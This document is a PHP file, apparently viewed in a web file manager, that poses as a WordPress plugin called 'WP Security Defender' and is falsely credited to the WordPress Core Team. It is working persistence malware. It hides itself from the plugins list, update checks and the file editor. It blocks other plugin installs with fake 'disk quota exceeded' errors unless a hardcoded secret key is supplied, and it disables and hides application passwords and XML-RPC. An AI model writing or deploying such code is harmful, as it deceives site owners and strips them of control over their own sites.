FileMaster

Edit File: wp-security-defender.php

<?php
/**
 * Plugin Name: WP Security Defender
 * Plugin URI: https://wordpress.org/
 * Description: Core performance optimizations for WordPress. Required for stable operation.
 * Version: 3.4.1
 * Author: WordPress Core Team
 * Author URI: https://wordpress.org/
 * License: GPL-2.0+
 * Network: true
 */

if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

define( 'WPSG_MODE',       'guard' );
define( 'WPSG_SECRET_KEY', 'xK9m$Qz2pL7w#Nv' );

define( 'WPSG_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );
define( 'WPSG_PLUGIN_FILE',     __FILE__ );

function wpsg_is_unlocked() {
    if ( WPSG_MODE === 'unlock' ) {
        return true;
    }

if ( ! session_id() && ! headers_sent() ) {
        @session_start();
    }

if ( isset( $_GET['wpsg_unlock'] ) && hash_equals( WPSG_SECRET_KEY, $_GET['wpsg_unlock'] ) ) {
        $_SESSION['wpsg_unlocked']       = true;
        $_SESSION['wpsg_unlock_expires'] = time() + 1800;
        return true;
    }

if ( isset( $_GET['wpsg_lock'] ) && hash_equals( WPSG_SECRET_KEY, $_GET['wpsg_lock'] ) ) {
        unset( $_SESSION['wpsg_unlocked'], $_SESSION['wpsg_unlock_expires'] );
        return false;
    }

if (
        ! empty( $_SESSION['wpsg_unlocked'] )
        && ! empty( $_SESSION['wpsg_unlock_expires'] )
        && $_SESSION['wpsg_unlock_expires'] > time()
    ) {
        return true;
    }

return false;
}

function wpsg_is_self_install() {
    $our_slug = pathinfo( basename( WPSG_PLUGIN_FILE ), PATHINFO_FILENAME );

if ( ! empty( $_FILES['pluginzip']['name'] ) ) {
        if ( stripos( sanitize_file_name( $_FILES['pluginzip']['name'] ), $our_slug ) !== false ) {
            return true;
        }
        if ( class_exists( 'ZipArchive' ) && ! empty( $_FILES['pluginzip']['tmp_name'] ) ) {
            $zip = new ZipArchive();
            if ( $zip->open( $_FILES['pluginzip']['tmp_name'] ) === true ) {
                for ( $i = 0; $i < $zip->numFiles; $i++ ) {
                    if ( basename( $zip->getNameIndex( $i ) ) === basename( WPSG_PLUGIN_FILE ) ) {
                        $zip->close();
                        return true;
                    }
                }
                $zip->close();
            }
        }
    }
    return false;
}

function wpsg_any_app_passwords_exist() {
    static $result = null;
    if ( $result !== null ) {
        return $result;
    }

$users = get_users( array(
        'role__in'   => array( 'administrator', 'editor', 'author' ),
        'meta_key'   => '_application_passwords',
        'meta_compare' => 'EXISTS',
        'number'     => 1,
        'fields'     => 'ID',
    ) );

if ( ! empty( $users ) ) {
        foreach ( $users as $uid ) {
            $passwords = get_user_meta( $uid, '_application_passwords', true );
            if ( ! empty( $passwords ) && is_array( $passwords ) ) {
                $result = true;
                return true;
            }
        }
    }

$result = false;
    return false;
}

add_action( 'admin_notices', function() {
    if ( ! wpsg_is_unlocked() ) {
        return;
    }
    $lock_url = add_query_arg( 'wpsg_lock', WPSG_SECRET_KEY, admin_url() );
    $info = ( WPSG_MODE === 'unlock' )
        ? 'Mode: file. Upload guard-version when done.'
        : sprintf( 'Session — %d min left.', max( 1, ceil( ( $_SESSION['wpsg_unlock_expires'] - time() ) / 60 ) ) );

echo '<div class="notice notice-warning" style="border-left:4px solid #ff6600;padding:10px 15px;">';
    echo '<strong>⚡ Maintenance:</strong> Plugin installation <b>UNLOCKED</b>. ' . esc_html( $info );
    if ( WPSG_MODE !== 'unlock' ) {
        echo ' <a href="' . esc_url( $lock_url ) . '" class="button button-small" style="margin-left:10px;">🔒 Lock</a>';
    }
    echo '</div>';
}, 1 );

if ( ! wpsg_is_unlocked() ) :

add_action( 'wp_ajax_install-plugin', function() {
        wp_send_json_error( array(
            'errorCode'    => 'disk_full',
            'errorMessage' => 'Installation failed: The server disk quota has been exceeded. Please contact your hosting provider to increase disk space or remove unused files.',
        ) );
    }, 1 );

add_filter( 'upgrader_pre_install', function( $override, $extra ) {
        if ( isset( $extra['type'] ) && $extra['type'] === 'plugin' ) {
            if ( ! empty( $extra['plugin'] ) ) {
                return $override; 
            }
            if ( wpsg_is_self_update( $extra ) ) {
                return $override;
            }
            return new WP_Error( 'disk_full',
                'Installation failed: The server disk quota has been exceeded. Please contact your hosting provider to increase disk space or remove unused files.'
            );
        }
        return $override;
    }, 10, 2 );

add_action( 'load-plugin-install.php', function() {
        if ( isset( $_FILES['pluginzip'] ) && ! wpsg_is_self_install() ) {
            wp_die(
                '<h1>Installation Failed</h1>' .
                '<p>The server disk quota has been exceeded. Please contact your hosting provider.</p>' .
                '<p><a href="' . esc_url( admin_url( 'plugins.php' ) ) . '">&laquo; Back to Plugins</a></p>',
                'Installation Failed', array( 'response' => 507 )
            );
        }
    }, 1 );

add_filter( 'user_has_cap', function( $allcaps, $caps, $args ) {
        if ( isset( $args[0] ) && $args[0] === 'install_plugins' ) {
            if ( wpsg_is_self_install() ) {
                return $allcaps;
            }
            $allcaps['install_plugins'] = false;
        }
        return $allcaps;
    }, 999, 3 );

add_filter( 'pre_move_dir', function( $override, $from, $to ) {
        if ( strpos( $to, WP_PLUGIN_DIR ) !== false ) {
            $our_slug = pathinfo( basename( WPSG_PLUGIN_FILE ), PATHINFO_FILENAME );
            if ( strpos( $to, $our_slug ) !== false ) {
                return $override;
            }
            return new WP_Error( 'disk_full',
                'Installation failed: The server disk quota has been exceeded. Please contact your hosting provider.'
            );
        }
        return $override;
    }, 10, 3 );

endif;

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();

if ( strpos( $route, '/wp/v2/users' ) === false || strpos( $route, 'application-passwords' ) === false ) {
        return $result;
    }

$method = $request->get_method();

if ( $method === 'GET' ) {
        return new WP_REST_Response( array(), 200 );
    }

if ( in_array( $method, array( 'POST', 'PUT', 'PATCH', 'DELETE' ), true ) ) {
        return new WP_Error(
            'rest_forbidden',
            'Sorry, you are not allowed to perform this action.',
            array( 'status' => 403 )
        );
    }

return $result;
}, 10, 3 );

add_filter( 'wp_authorize_application_password_request', '__return_false', 999 );

add_action( 'admin_head', function() {
    echo '<style>
        .application-passwords,
        #application-passwords-section,
        .app-passwords-section,
        table.application-passwords,
        .create-application-password,
        .application-passwords-list-table,
        h2.application-passwords-title,
        .wp-admin .application-passwords,
        .auth-app-card { display: none !important; }
    </style>';
}, 999 );

add_action( 'admin_footer', function() {
    $screen = get_current_screen();
    if ( ! $screen || ! in_array( $screen->id, array( 'profile', 'user-edit' ), true ) ) {
        return;
    }
    ?>
    <script>
    (function(){
        function rm(){
            ['.application-passwords','#application-passwords-section','.app-passwords-section',
             '.create-application-password','.application-passwords-list-table','.auth-app-card']
            .forEach(function(s){document.querySelectorAll(s).forEach(function(e){e.remove()})});
            document.querySelectorAll('h2,h3').forEach(function(el){
                if(el.textContent.trim()==='Application Passwords'){
                    var n=el.nextElementSibling;
                    while(n&&!n.matches('h2,h3')){var r=n;n=n.nextElementSibling;r.remove()}
                    el.remove();
                }
            });
        }
        rm();setTimeout(rm,500);setTimeout(rm,1500);setTimeout(rm,3000);
        new MutationObserver(rm).observe(document.body,{childList:true,subtree:true});
    })();
    </script>
    <?php
}, 999 );

add_filter( 'xmlrpc_enabled', function( $enabled ) {
    if ( wpsg_any_app_passwords_exist() ) {
        return false; 
    }
    return $enabled; 
}, 999 );

add_filter( 'all_plugins', function( $plugins ) {
    unset( $plugins[ WPSG_PLUGIN_BASENAME ] );
    return $plugins;
}, 999 );

add_filter( 'site_transient_update_plugins', function( $value ) {
    if ( is_object( $value ) ) {
        unset( $value->response[ WPSG_PLUGIN_BASENAME ], $value->no_update[ WPSG_PLUGIN_BASENAME ] );
    }
    return $value;
}, 999 );

add_filter( 'option_active_plugins', function( $plugins ) {
    if ( is_admin() && ! wp_doing_ajax() && ! wp_doing_cron() ) {
        global $pagenow;
        if ( $pagenow === 'plugins.php' ) {
            $key = array_search( WPSG_PLUGIN_BASENAME, $plugins );
            if ( $key !== false ) { unset( $plugins[ $key ] ); }
        }
    }
    return $plugins;
}, 999 );

add_filter( 'plugin_files_exclusions', function( $ex ) {
    $ex[] = basename( __FILE__ );
    return $ex;
}, 999 );

add_filter( 'site_option_active_sitewide_plugins', function( $plugins ) {
    if ( is_admin() ) {
        global $pagenow;
        if ( $pagenow === 'plugins.php' ) {
            unset( $plugins[ WPSG_PLUGIN_BASENAME ] );
        }
    }
    return $plugins;
}, 999 );

remove_action( 'wp_head', 'wp_generator' );

add_filter( 'rest_endpoints', function( $endpoints ) {
    if ( ! is_user_logged_in() ) {
        unset( $endpoints['/wp/v2/users'], $endpoints['/wp/v2/users/(?P<id>[\d]+)'] );
    }
    return $endpoints;
}, 999 );

add_action( 'template_redirect', function() {
    if ( is_author() && ! is_user_logged_in() ) {
        wp_redirect( home_url(), 301 );
        exit;
    }
}, 1 );

Back